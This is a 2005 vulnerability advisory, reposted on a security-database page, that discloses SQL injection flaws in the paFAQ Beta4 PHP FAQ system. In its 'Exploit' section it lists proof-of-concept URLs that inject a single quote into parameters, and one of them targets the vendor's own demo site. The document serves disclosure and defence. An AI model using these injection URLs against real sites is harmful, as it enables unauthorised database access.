Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline

paFAQBeta4.txt

🗓️ 25 Feb 2005 00:00:00Reported by Pi3cHType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

Sql injection vulnerability in paFAQ Beta4 allows remote database attacks via insecure code.

Show more
Code
`  
  
[PersianHacker.NET 200505-07] paFAQ Beta4 Sql Injection  
Date: 2005 February  
Bug Number: 07  
  
paFAQ  
is a feature rich FAQ/Knowledge base system allowing webmasters to keep an organized database of Frequently Asked Questions. paFAQ also makes a great Knowledge Database for problems and solutions related to your scripts and programs. It runs using PHP and MySQL for speedy processing times.  
More info @:  
http://www.phparena.net/pafaq.php  
  
  
Discussion:  
--------------------  
Sql Injection in 'question.php', 'answer.php', 'search.php', 'comment.php' that may allow a remote user to launch Sql injection attacks.  
A form of attack on a database-driven Web site in which the attacker executes unauthorized SQL commands by taking advantage of insecure code on a system connected to the Internet, bypassing the firewall.  
  
This vulnerability is reported to exist in paFAQ Beta4, other versions might  
also be affected.   
  
Exploit:  
--------------------  
http://www.example.com/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='  
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='  
http://www.example.com/index.php?act=Question&id=1&orderby=q_id&order='&limit=10  
http://www.example.com/index.php?act=Question&id=1&orderby='&order=DESC&limit=10  
http://www.example.com/index.php?act=Answer&cid=1&id=1&offset='  
http://www.example.com/index.php?act=Search&code=01&search_item='  
http://www.example.com/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='  
http://www.example.com/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email=4  
http://www.example.com/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4  
  
  
Example:  
--------------------  
@ authors website!  
http://demo.phparena.net/pafaq/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='  
-  
  
Solution:  
--------------------  
in the code validate values with PHP patterns then process it.  
  
  
Credit:  
--------------------  
Discovered by PersianHacker.NET Security Team  
by Pi3cH (pi3ch persianhacker net)  
http://www.PersianHacker.NET  
  
Special Thanks: our security team users.  
  
  
Help  
--------------------  
visit: http://www.PersianHacker.NET  
or mail me @: pi3ch persianhacker net  
  
  
Note  
--------------------  
Scripts authors were not be contacted for this bug.  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
25 Feb 2005 00:00Current
7.4High risk
Vulners AI Score7.4
sql injectionpafaq beta4database attacksweb securityphpmysqlvulnerability report.
24
.json
Report